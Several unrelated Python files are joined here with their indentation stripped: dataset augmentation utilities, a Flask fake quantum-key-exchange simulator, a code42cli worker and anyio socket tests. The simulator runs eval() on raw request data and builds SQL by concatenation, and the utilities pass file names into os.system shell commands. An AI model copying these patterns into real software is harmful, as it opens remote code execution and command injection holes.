x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.2): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
fakeKE.py | from QKD import QKD
import mysql.connector
import hvac
from random import randint
import yaml
import time
from flask import Flask, request
import requests
import multiprocessing
from multiprocessing import Process
import logging
app = Flask(__name__)
server = None
serverPort = 4000
# utility function - timeout parameter is expressed in milliseconds
# convert epoch time to milliseconds
current_time = lambda: int(round(time.time() * 1000))
def run():
fh = logging.FileHandler('bb84.log')
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
app.logger.addHandler(fh)
app.logger.setLevel(logging.DEBUG)
app.run(host='0.0.0.0', port=serverPort)
@app.route('/sendRegister', methods=['POST'])
def getQuantumKey():
pref_file = open("/usr/src/app/src/configM.yaml", 'r')
prefs = yaml.safe_load(pref_file)
key = eval(request.data)
requestIP = request.remote_addr
# retrieve information about this destination if any
db = mysql.connector.connect(host=str(prefs['internal_db']['host']), port=str(prefs['internal_db']['port']), user=str(prefs['internal_db']['user']), passwd=str(prefs['internal_db']['passwd']), database=str(prefs['internal_db']['database']), autocommit=True)
cursor = db.cursor()
cursor.execute("SELECT * FROM " + str(prefs['simulator']['table']))
result = cursor.fetchone()
if result is not None:
# previous key exchange is not completed yet, return an error
return "Error", 400
else:
# a new key exchange can be started
# save key in vault
client = hvac.Client(url='http://' + prefs['vault']['host'] + ':' + str(prefs['vault']['port']))
client.token = prefs['vault']['token']
client.secrets.kv.v2.create_or_update_secret(path='currentKey', secret=dict(key=key),)
# insert information in db
cursor.execute("INSERT INTO " + str(prefs['simulator']['table']) + " (requestIP, complete, verified) VALUES ('%s', True, True)" % (requestIP))
return "OK", 200
class fakeKE(QKD):
def exchangeKey(self, key_length, destination='http://localhost:4000', timeout=0, source=1, eve=False):
pref_file = open("/usr/src/app/src/configM.yaml", 'r')
prefs = yaml.safe_load(pref_file)
app.logger.info('Starting key exchange. Desired key length: %s' % str(key_length))
# sender source code
if source == 1:
# generate a new fake key
key = []
for i in range(key_length):
key.append(randint(0,1))
# forward the key to destination
x = requests.post(destination + '/sendRegister?newKey=true&keyLen=' + str(key_length), data = repr(key))
if x.status_code != 200:
# send key failed
return None, False
# key exchange succeded
return key, True
# destination source code
else:
# check if a key has already been exchanged with desired destination
destAddr = str(destination.split(':')[1][2:])
db = mysql.connector.connect(host=str(prefs['internal_db']['host']), port=str(prefs['internal_db']['port']), user=str(prefs['internal_db']['user']), passwd=str(prefs['internal_db']['passwd']), database=str(prefs['internal_db']['database']), autocommit=True)
cursor = db.cursor()
cursor.execute("SELECT * FROM " + str(prefs['simulator']['table']))
result = cursor.fetchone()
if result is None:
# key has not been received yet, wait until the key is received or timeout elapses
start_time = current_time()
while result is None:
cursor.execute("SELECT * FROM " + str(prefs['simulator']['table']))
result = cursor.fetchone()
if current_time() > start_time + timeout:
# timeout elapsed - clean requests list
cursor.execute("DELETE FROM " + str(prefs['simulator']['table']))
return None, 4
# now key exchange is complete
verified = result[3]
# key is saved in vault
client = hvac.Client(url='http://' + prefs['vault']['host'] + ':' + str(prefs['vault']['port']))
client.token = prefs['vault']['token']
response = client.secrets.kv.read_secret_version(path='currentKey')
key = response['data']['data']['key']
# delete key once returned
client.secrets.kv.delete_metadata_and_all_versions('currentKey')
# once key has been exchange, delete its data from this module
cursor.execute("LOCK TABLES " + str(prefs['simulator']['table']) + " WRITE")
cursor.execute("DELETE FROM " + str(prefs['simulator']['table']))
return key, verified
def begin(self, port = 4000):
global server
global serverPort
serverPort = port
# configure logger
# file logging
fh = logging.FileHandler('bb84.log')
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
app.logger.addHandler(fh)
app.logger.setLevel(logging.DEBUG)
# start server
app.logger.info('Starting server')
server = Process(target=run)
server.start()
def end(self):
app.logger.info('Killing threads')
server.terminate()
server.join()
app.logger.info('Correctly quit application')
|
worker.py | import queue
from threading import Lock
from threading import Thread
from time import sleep
from py42.exceptions import Py42ForbiddenError
from py42.exceptions import Py42HTTPError
from code42cli.errors import Code42CLIError
from code42cli.logger import get_main_cli_logger
def create_worker_stats(total):
return WorkerStats(total)
class WorkerStats:
"""Stats about the tasks that have run."""
def __init__(self, total):
self.total = total
_total_processed = 0
_total_errors = 0
_results = []
__total_processed_lock = Lock()
__total_errors_lock = Lock()
__results_lock = Lock()
@property
def total_processed(self):
"""The total number of tasks executed."""
return self._total_processed
@property
def total_errors(self):
"""The amount of errors that occurred."""
return self._total_errors
@property
def total_successes(self):
val = self._total_processed - self._total_errors
return val if val >= 0 else 0
@property
def results(self):
return self._results
def __str__(self):
return f"{self.total_successes} succeeded, {self._total_errors} failed out of {self.total}"
def increment_total_processed(self):
"""+1 to self.total_processed"""
with self.__total_processed_lock:
self._total_processed += 1
def increment_total_errors(self):
"""+1 to self.total_errors"""
with self.__total_errors_lock:
self._total_errors += 1
def add_result(self, result):
"""add a result to the list"""
with self.__results_lock:
self._results.append(result)
def reset_results(self):
with self.__results_lock:
self._results = []
class Worker:
def __init__(self, thread_count, expected_total, bar=None, stats=None):
self._queue = queue.Queue()
self._thread_count = thread_count
self._bar = bar
self._stats = stats or WorkerStats(expected_total)
self._tasks = 0
self.__started = False
self.__start_lock = Lock()
self._logger = get_main_cli_logger()
def do_async(self, func, *args, **kwargs):
"""Execute the given func asynchronously given *args and **kwargs.
Args:
func (callable): The function to execute asynchronously.
*args (iter): Positional args to pass to the function.
**kwargs (dict): Key-value args to pass to the function.
"""
if not self.__started:
with self.__start_lock:
if not self.__started:
self.__start()
self.__started = True
self._queue.put({"func": func, "args": args, "kwargs": kwargs})
self._tasks += 1
@property
def stats(self):
"""Stats about the tasks that have been executed, such as the total errors that occurred.
"""
return self._stats
def wait(self):
"""Wait for the tasks in the queue to complete. This should usually be called before
program termination."""
while self._stats.total_processed < self._tasks:
sleep(0.5)
def _process_queue(self):
while True:
try:
task = self._queue.get()
func = task["func"]
args = task["args"]
kwargs = task["kwargs"]
self._stats.add_result(func(*args, **kwargs))
except Code42CLIError as err:
self._increment_total_errors()
self._logger.log_error(err)
except Py42ForbiddenError as err:
self._increment_total_errors()
self._logger.log_verbose_error(http_request=err.response.request)
self._logger.log_error(
"You do not have the necessary permissions to perform this task. "
"Try using or creating a different profile."
)
except Py42HTTPError as err:
self._increment_total_errors()
self._logger.log_verbose_error(http_request=err.response.request)
except Exception:
self._increment_total_errors()
self._logger.log_verbose_error()
finally:
self._stats.increment_total_processed()
if self._bar:
self._bar.update(1)
self._queue.task_done()
def __start(self):
for _ in range(0, self._thread_count):
t = Thread(target=self._process_queue)
t.daemon = True
t.start()
def _increment_total_errors(self):
self._stats.increment_total_errors()
|
test_sockets.py | import array
import gc
import io
import os
import platform
import socket
import sys
import threading
import time
from contextlib import suppress
from pathlib import Path
from socket import AddressFamily
from ssl import SSLContext, SSLError
from threading import Thread
from typing import (
Any,
Iterable,
Iterator,
List,
NoReturn,
Tuple,
Type,
TypeVar,
Union,
cast,
)
import pytest
from _pytest.fixtures import SubRequest
from _pytest.logging import LogCaptureFixture
from _pytest.monkeypatch import MonkeyPatch
from _pytest.tmpdir import TempPathFactory
from anyio import (
BrokenResourceError,
BusyResourceError,
ClosedResourceError,
Event,
ExceptionGroup,
TypedAttributeLookupError,
connect_tcp,
connect_unix,
create_connected_udp_socket,
create_task_group,
create_tcp_listener,
create_udp_socket,
create_unix_listener,
fail_after,
getaddrinfo,
getnameinfo,
move_on_after,
sleep,
wait_all_tasks_blocked,
)
from anyio.abc import (
IPSockAddrType,
Listener,
SocketAttribute,
SocketListener,
SocketStream,
)
from anyio.streams.stapled import MultiListener
if sys.version_info >= (3, 8):
from typing import Literal
else:
from typing_extensions import Literal
AnyIPAddressFamily = Literal[
AddressFamily.AF_UNSPEC, AddressFamily.AF_INET, AddressFamily.AF_INET6
]
pytestmark = pytest.mark.anyio
# If a socket can bind to ::1, the current environment has IPv6 properly configured
has_ipv6 = False
if socket.has_ipv6:
try:
s = socket.socket(AddressFamily.AF_INET6)
try:
s.bind(("::1", 0))
finally:
s.close()
del s
except OSError:
pass
else:
has_ipv6 = True
@pytest.fixture
def fake_localhost_dns(monkeypatch: MonkeyPatch) -> None:
def fake_getaddrinfo(*args: Any, **kwargs: Any) -> object:
# Make it return IPv4 addresses first so we can test the IPv6 preference
results = real_getaddrinfo(*args, **kwargs)
return sorted(results, key=lambda item: item[0])
real_getaddrinfo = socket.getaddrinfo
monkeypatch.setattr("socket.getaddrinfo", fake_getaddrinfo)
@pytest.fixture(
params=[
pytest.param(AddressFamily.AF_INET, id="ipv4"),
pytest.param(
AddressFamily.AF_INET6,
id="ipv6",
marks=[pytest.mark.skipif(not has_ipv6, reason="no IPv6 support")],
),
]
)
def family(request: SubRequest) -> AnyIPAddressFamily:
return request.param
@pytest.fixture
def check_asyncio_bug(anyio_backend_name: str, family: AnyIPAddressFamily) -> None:
if (
anyio_backend_name == "asyncio"
and sys.platform == "win32"
and family == AddressFamily.AF_INET6
):
import asyncio
policy = asyncio.get_event_loop_policy()
if policy.__class__.__name__ == "WindowsProactorEventLoopPolicy":
pytest.skip("Does not work due to a known bug (39148)")
_T = TypeVar("_T")
def _identity(v: _T) -> _T:
return v
# _ProactorBasePipeTransport.abort() after _ProactorBasePipeTransport.close()
# does not cancel writes: https://bugs.python.org/issue44428
_ignore_win32_resource_warnings = (
pytest.mark.filterwarnings(
"ignore:unclosed <socket.socket:ResourceWarning",
"ignore:unclosed transport <_ProactorSocketTransport closing:ResourceWarning",
)
if sys.platform == "win32"
else _identity
)
@_ignore_win32_resource_warnings # type: ignore[operator]
class TestTCPStream:
@pytest.fixture
def server_sock(self, family: AnyIPAddressFamily) -> Iterator[socket.socket]:
sock = socket.socket(family, socket.SOCK_STREAM)
sock.settimeout(1)
sock.bind(("localhost", 0))
sock.listen()
yield sock
sock.close()
@pytest.fixture
def server_addr(self, server_sock: socket.socket) -> Tuple[str, int]:
return server_sock.getsockname()[:2]
async def test_extra_attributes(
self,
server_sock: socket.socket,
server_addr: Tuple[str, int],
family: AnyIPAddressFamily,
) -> None:
async with await connect_tcp(*server_addr) as stream:
raw_socket = stream.extra(SocketAttribute.raw_socket)
assert stream.extra(SocketAttribute.family) == family
assert (
stream.extra(SocketAttribute.local_address)
== raw_socket.getsockname()[:2]
)
assert (
stream.extra(SocketAttribute.local_port) == raw_socket.getsockname()[1]
)
assert stream.extra(SocketAttribute.remote_address) == server_addr
assert stream.extra(SocketAttribute.remote_port) == server_addr[1]
async def test_send_receive(
self, server_sock: socket.socket, server_addr: Tuple[str, int]
) -> None:
async with await connect_tcp(*server_addr) as stream:
client, _ = server_sock.accept()
await stream.send(b"blah")
request = client.recv(100)
client.sendall(request[::-1])
response = await stream.receive()
client.close()
assert response == b"halb"
async def test_send_large_buffer(
self, server_sock: socket.socket, server_addr: Tuple[str, int]
) -> None:
def serve() -> None:
client, _ = server_sock.accept()
client.sendall(buffer)
client.close()
buffer = (
b"\xff" * 1024 * 1024
) # should exceed the maximum kernel send buffer size
async with await connect_tcp(*server_addr) as stream:
thread = Thread(target=serve, daemon=True)
thread.start()
response = b""
while len(response) < len(buffer):
response += await stream.receive()
thread.join()
assert response == buffer
async def test_send_eof(
self, server_sock: socket.socket, server_addr: Tuple[str, int]
) -> None:
def serve() -> None:
client, _ = server_sock.accept()
request = b""
while True:
data = client.recv(100)
request += data
if not data:
break
client.sendall(request[::-1])
client.close()
async with await connect_tcp(*server_addr) as stream:
thread = Thread(target=serve, daemon=True)
thread.start()
await stream.send(b"hello, ")
await stream.send(b"world\n")
await stream.send_eof()
response = await stream.receive()
thread.join()
assert response == b"\ndlrow ,olleh"
async def test_iterate(
self, server_sock: socket.socket, server_addr: Tuple[str, int]
) -> None:
def serve() -> None:
client, _ = server_sock.accept()
client.sendall(b"bl")
event.wait(1)
client.sendall(b"ah")
client.close()
event = threading.Event()
thread = Thread(target=serve, daemon=True)
thread.start()
chunks = []
async with await connect_tcp(*server_addr) as stream:
async for chunk in stream:
chunks.append(chunk)
event.set()
thread.join()
assert chunks == [b"bl", b"ah"]
async def test_socket_options(
self, family: AnyIPAddressFamily, server_addr: Tuple[str, int]
) -> None:
async with await connect_tcp(*server_addr) as stream:
raw_socket = stream.extra(SocketAttribute.raw_socket)
assert raw_socket.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY) != 0
@pytest.mark.skipif(not has_ipv6, reason="IPv6 is not available")
@pytest.mark.parametrize(
"local_addr, expected_client_addr",
[
pytest.param("", "::1", id="dualstack"),
pytest.param("127.0.0.1", "127.0.0.1", id="ipv4"),
pytest.param("::1", "::1", id="ipv6"),
],
)
async def test_happy_eyeballs(
self, local_addr: str, expected_client_addr: str, fake_localhost_dns: None
) -> None:
client_addr = None, None
def serve() -> None:
nonlocal client_addr
client, client_addr = server_sock.accept()
client.close()
family = (
AddressFamily.AF_INET
if local_addr == "127.0.0.1"
else AddressFamily.AF_INET6
)
server_sock = socket.socket(family)
server_sock.bind((local_addr, 0))
server_sock.listen()
port = server_sock.getsockname()[1]
thread = Thread(target=serve, daemon=True)
thread.start()
async with await connect_tcp("localhost", port):
pass
thread.join()
server_sock.close()
assert client_addr[0] == expected_client_addr
@pytest.mark.parametrize(
"target, exception_class",
[
pytest.param(
"localhost",
ExceptionGroup,
id="multi",
marks=[
pytest.mark.skipif(not has_ipv6, reason="IPv6 is not available")
],
),
pytest.param("127.0.0.1", ConnectionRefusedError, id="single"),
],
)
async def test_connection_refused(
self,
target: str,
exception_class: Union[Type[ExceptionGroup], Type[ConnectionRefusedError]],
fake_localhost_dns: None,
) -> None:
dummy_socket = socket.socket(AddressFamily.AF_INET6)
dummy_socket.bind(("::", 0))
free_port = dummy_socket.getsockname()[1]
dummy_socket.close()
with pytest.raises(OSError) as exc:
await connect_tcp(target, free_port)
assert exc.match("All connection attempts failed")
assert isinstance(exc.value.__cause__, exception_class)
if isinstance(exc.value.__cause__, ExceptionGroup):
for exception in exc.value.__cause__.exceptions:
assert isinstance(exception, ConnectionRefusedError)
async def test_receive_timeout(
self, server_sock: socket.socket, server_addr: Tuple[str, int]
) -> None:
def serve() -> None:
conn, _ = server_sock.accept()
time.sleep(1)
conn.close()
thread = Thread(target=serve, daemon=True)
thread.start()
async with await connect_tcp(*server_addr) as stream:
start_time = time.monotonic()
with move_on_after(0.1):
while time.monotonic() - start_time < 0.3:
await stream.receive(1)
pytest.fail("The timeout was not respected")
async def test_concurrent_send(self, server_addr: Tuple[str, int]) -> None:
async def send_data() -> NoReturn:
while True:
await stream.send(b"\x00" * 4096)
async with await connect_tcp(*server_addr) as stream:
async with create_task_group() as tg:
tg.start_soon(send_data)
await wait_all_tasks_blocked()
with pytest.raises(BusyResourceError) as exc:
await stream.send(b"foo")
exc.match("already writing to")
tg.cancel_scope.cancel()
async def test_concurrent_receive(self, server_addr: Tuple[str, int]) -> None:
async with await connect_tcp(*server_addr) as client:
async with create_task_group() as tg:
tg.start_soon(client.receive)
await wait_all_tasks_blocked()
try:
with pytest.raises(BusyResourceError) as exc:
await client.receive()
exc.match("already reading from")
finally:
tg.cancel_scope.cancel()
async def test_close_during_receive(self, server_addr: Tuple[str, int]) -> None:
async def interrupt() -> None:
await wait_all_tasks_blocked()
await stream.aclose()
async with await connect_tcp(*server_addr) as stream:
async with create_task_group() as tg:
tg.start_soon(interrupt)
with pytest.raises(ClosedResourceError):
await stream.receive()
async def test_receive_after_close(self, server_addr: Tuple[str, int]) -> None:
stream = await connect_tcp(*server_addr)
await stream.aclose()
with pytest.raises(ClosedResourceError):
await stream.receive()
async def test_send_after_close(self, server_addr: Tuple[str, int]) -> None:
stream = await connect_tcp(*server_addr)
await stream.aclose()
with pytest.raises(ClosedResourceError):
await stream.send(b"foo")
async def test_send_after_peer_closed(self, family: AnyIPAddressFamily) -> None:
def serve_once() -> None:
client_sock, _ = server_sock.accept()
client_sock.close()
server_sock.close()
server_sock = socket.socket(family, socket.SOCK_STREAM)
server_sock.settimeout(1)
server_sock.bind(("localhost", 0))
server_addr = server_sock.getsockname()[:2]
server_sock.listen()
thread = Thread(target=serve_once, daemon=True)
thread.start()
with pytest.raises(BrokenResourceError):
async with await connect_tcp(*server_addr) as stream:
for _ in range(1000):
await stream.send(b"foo")
thread.join()
async def test_connect_tcp_with_tls(
self,
server_context: SSLContext,
client_context: SSLContext,
server_sock: socket.socket,
server_addr: Tuple[str, int],
) -> None:
def serve() -> None:
with suppress(socket.timeout):
client, addr = server_sock.accept()
client.settimeout(1)
client = server_context.wrap_socket(client, server_side=True)
data = client.recv(100)
client.sendall(data[::-1])
client.unwrap()
client.close()
# The TLSStream tests are more comprehensive than this one!
thread = Thread(target=serve, daemon=True)
thread.start()
async with await connect_tcp(
*server_addr, tls_hostname="localhost", ssl_context=client_context
) as stream:
await stream.send(b"hello")
response = await stream.receive()
assert response == b"olleh"
thread.join()
async def test_connect_tcp_with_tls_cert_check_fail(
self,
server_context: SSLContext,
server_sock: socket.socket,
server_addr: Tuple[str, int],
) -> None:
thread_exception = None
def serve() -> None:
nonlocal thread_exception
client, addr = server_sock.accept()
with client:
client.settimeout(1)
try:
server_context.wrap_socket(client, server_side=True)
except OSError:
pass
except BaseException as exc:
thread_exception = exc
thread = Thread(target=serve, daemon=True)
thread.start()
with pytest.raises(SSLError):
await connect_tcp(*server_addr, tls_hostname="localhost")
thread.join()
assert thread_exception is None
@pytest.mark.parametrize("anyio_backend", ["asyncio"])
async def test_unretrieved_future_exception_server_crash(
self, family: AnyIPAddressFamily, caplog: LogCaptureFixture
) -> None:
"""
Tests that there won't be any leftover Futures that don't get their exceptions retrieved.
See https://github.com/encode/httpcore/issues/382 for details.
"""
def serve() -> None:
sock, addr = server_sock.accept()
event.wait(3)
del sock
gc.collect()
server_sock = socket.socket(family, socket.SOCK_STREAM)
server_sock.settimeout(1)
server_sock.bind(("localhost", 0))
server_sock.listen()
server_addr = server_sock.getsockname()[:2]
event = threading.Event()
thread = Thread(target=serve)
thread.start()
async with await connect_tcp(*server_addr) as stream:
await stream.send(b"GET")
event.set()
with pytest.raises(BrokenResourceError):
await stream.receive()
thread.join()
gc.collect()
assert not caplog.text
class TestTCPListener:
async def test_extra_attributes(self, family: AnyIPAddressFamily) -> None:
async with await create_tcp_listener(
local_host="localhost", family=family
) as multi:
assert multi.extra(SocketAttribute.family) == family
for listener in multi.listeners:
raw_socket = listener.extra(SocketAttribute.raw_socket)
assert listener.extra(SocketAttribute.family) == family
assert (
listener.extra(SocketAttribute.local_address)
== raw_socket.getsockname()[:2]
)
assert (
listener.extra(SocketAttribute.local_port)
== raw_socket.getsockname()[1]
)
pytest.raises(
TypedAttributeLookupError,
listener.extra,
SocketAttribute.remote_address,
)
pytest.raises(
TypedAttributeLookupError,
listener.extra,
SocketAttribute.remote_port,
)
@pytest.mark.parametrize(
"family",
[
pytest.param(AddressFamily.AF_INET, id="ipv4"),
pytest.param(
AddressFamily.AF_INET6,
id="ipv6",
marks=[pytest.mark.skipif(not has_ipv6, reason="no IPv6 support")],
),
pytest.param(
socket.AF_UNSPEC,
id="both",
marks=[pytest.mark.skipif(not has_ipv6, reason="no IPv6 support")],
),
],
)
async def test_accept(self, family: AnyIPAddressFamily) -> None:
async with await create_tcp_listener(
local_host="localhost", family=family
) as multi:
for listener in multi.listeners:
client = socket.socket(listener.extra(SocketAttribute.family))
client.settimeout(1)
client.connect(listener.extra(SocketAttribute.local_address))
assert isinstance(listener, SocketListener)
stream = await listener.accept()
client.sendall(b"blah")
request = await stream.receive()
await stream.send(request[::-1])
assert client.recv(100) == b"halb"
client.close()
await stream.aclose()
async def test_accept_after_close(self, family: AnyIPAddressFamily) -> None:
async with await create_tcp_listener(
local_host="localhost", family=family
) as multi:
for listener in multi.listeners:
await listener.aclose()
assert isinstance(listener, SocketListener)
with pytest.raises(ClosedResourceError):
await listener.accept()
async def test_socket_options(self, family: AnyIPAddressFamily) -> None:
async with await create_tcp_listener(
local_host="localhost", family=family
) as multi:
for listener in multi.listeners:
raw_socket = listener.extra(SocketAttribute.raw_socket)
if sys.platform == "win32":
assert (
raw_socket.getsockopt(
socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE
)
!= 0
)
else:
assert (
raw_socket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
!= 0
)
raw_socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 80000)
assert raw_socket.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF) in (
80000,
160000,
)
client = socket.socket(raw_socket.family)
client.settimeout(1)
client.connect(raw_socket.getsockname())
assert isinstance(listener, SocketListener)
async with await listener.accept() as stream:
raw_socket = stream.extra(SocketAttribute.raw_socket)
assert raw_socket.gettimeout() == 0
assert raw_socket.family == listener.extra(SocketAttribute.family)
assert (
raw_socket.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
!= 0
)
client.close()
@pytest.mark.skipif(
not hasattr(socket, "SO_REUSEPORT"), reason="SO_REUSEPORT option not supported"
)
async def test_reuse_port(self, family: AnyIPAddressFamily) -> None:
multi1 = await create_tcp_listener(
local_host="localhost", family=family, reuse_port=True
)
assert len(multi1.listeners) == 1
multi2 = await create_tcp_listener(
local_host="localhost",
local_port=multi1.listeners[0].extra(SocketAttribute.local_port),
family=family,
reuse_port=True,
)
assert len(multi2.listeners) == 1
assert multi1.listeners[0].extra(
SocketAttribute.local_address
) == multi2.listeners[0].extra(SocketAttribute.local_address)
await multi1.aclose()
await multi2.aclose()
async def test_close_from_other_task(self, family: AnyIPAddressFamily) -> None:
listener = await create_tcp_listener(local_host="localhost", family=family)
with pytest.raises(ClosedResourceError):
async with create_task_group() as tg:
tg.start_soon(listener.serve, lambda stream: None)
await wait_all_tasks_blocked()
await listener.aclose()
tg.cancel_scope.cancel()
async def test_send_after_eof(self, family: AnyIPAddressFamily) -> None:
async def handle(stream: SocketStream) -> None:
async with stream:
await stream.send(b"Hello\n")
multi = await create_tcp_listener(family=family, local_host="localhost")
async with multi, create_task_group() as tg:
tg.start_soon(multi.serve, handle)
await wait_all_tasks_blocked()
with socket.socket(family) as client:
client.connect(multi.extra(SocketAttribute.local_address))
client.shutdown(socket.SHUT_WR)
client.setblocking(False)
with fail_after(1):
while True:
try:
message = client.recv(10)
except BlockingIOError:
await sleep(0)
else:
assert message == b"Hello\n"
break
tg.cancel_scope.cancel()
@pytest.mark.skipif(
sys.platform == "win32", reason="UNIX sockets are not available on Windows"
)
class TestUNIXStream:
@pytest.fixture
def socket_path(self, tmp_path_factory: TempPathFactory) -> Path:
return tmp_path_factory.mktemp("unix").joinpath("socket")
@pytest.fixture(params=[False, True], ids=["str", "path"])
def socket_path_or_str(
self, request: SubRequest, socket_path: Path
) -> Union[Path, str]:
return socket_path if request.param else str(socket_path)
@pytest.fixture
def server_sock(self, socket_path: Path) -> Iterable[socket.socket]:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.settimeout(1)
sock.bind(str(socket_path))
sock.listen()
yield sock
sock.close()
async def test_extra_attributes(
self, server_sock: socket.socket, socket_path: Path
) -> None:
async with await connect_unix(socket_path) as stream:
raw_socket = stream.extra(SocketAttribute.raw_socket)
assert stream.extra(SocketAttribute.family) == socket.AF_UNIX
assert (
stream.extra(SocketAttribute.local_address) == raw_socket.getsockname()
)
assert stream.extra(SocketAttribute.remote_address) == str(socket_path)
pytest.raises(
TypedAttributeLookupError, stream.extra, SocketAttribute.local_port
)
pytest.raises(
TypedAttributeLookupError, stream.extra, SocketAttribute.remote_port
)
async def test_send_receive(
self, server_sock: socket.socket, socket_path_or_str: Union[Path, str]
) -> None:
async with await connect_unix(socket_path_or_str) as stream:
client, _ = server_sock.accept()
await stream.send(b"blah")
request = client.recv(100)
client.sendall(request[::-1])
response = await stream.receive()
client.close()
assert response == b"halb"
async def test_send_large_buffer(
self, server_sock: socket.socket, socket_path: Path
) -> None:
def serve() -> None:
client, _ = server_sock.accept()
client.sendall(buffer)
client.close()
buffer = (
b"\xff" * 1024 * 1024
) # should exceed the maximum kernel send buffer size
async with await connect_unix(socket_path) as stream:
thread = Thread(target=serve, daemon=True)
thread.start()
response = b""
while len(response) < len(buffer):
response += await stream.receive()
thread.join()
assert response == buffer
async def test_receive_fds(
self, server_sock: socket.socket, socket_path: Path, tmp_path: Path
) -> None:
def serve() -> None:
path1 = tmp_path / "file1"
path2 = tmp_path / "file2"
path1.write_text("Hello, ")
path2.write_text("World!")
with path1.open() as file1, path2.open() as file2:
fdarray = array.array("i", [file1.fileno(), file2.fileno()])
client, _ = server_sock.accept()
cmsg = (socket.SOL_SOCKET, socket.SCM_RIGHTS, fdarray)
with client:
client.sendmsg([b"test"], [cmsg])
async with await connect_unix(socket_path) as stream:
thread = Thread(target=serve, daemon=True)
thread.start()
message, fds = await stream.receive_fds(10, 2)
thread.join()
text = ""
for fd in fds:
with os.fdopen(fd) as file:
text += file.read()
assert message == b"test"
assert text == "Hello, World!"
async def test_receive_fds_bad_args(
self, server_sock: socket.socket, socket_path: Path
) -> None:
async with await connect_unix(socket_path) as stream:
for msglen in (-1, "foo"):
with pytest.raises(
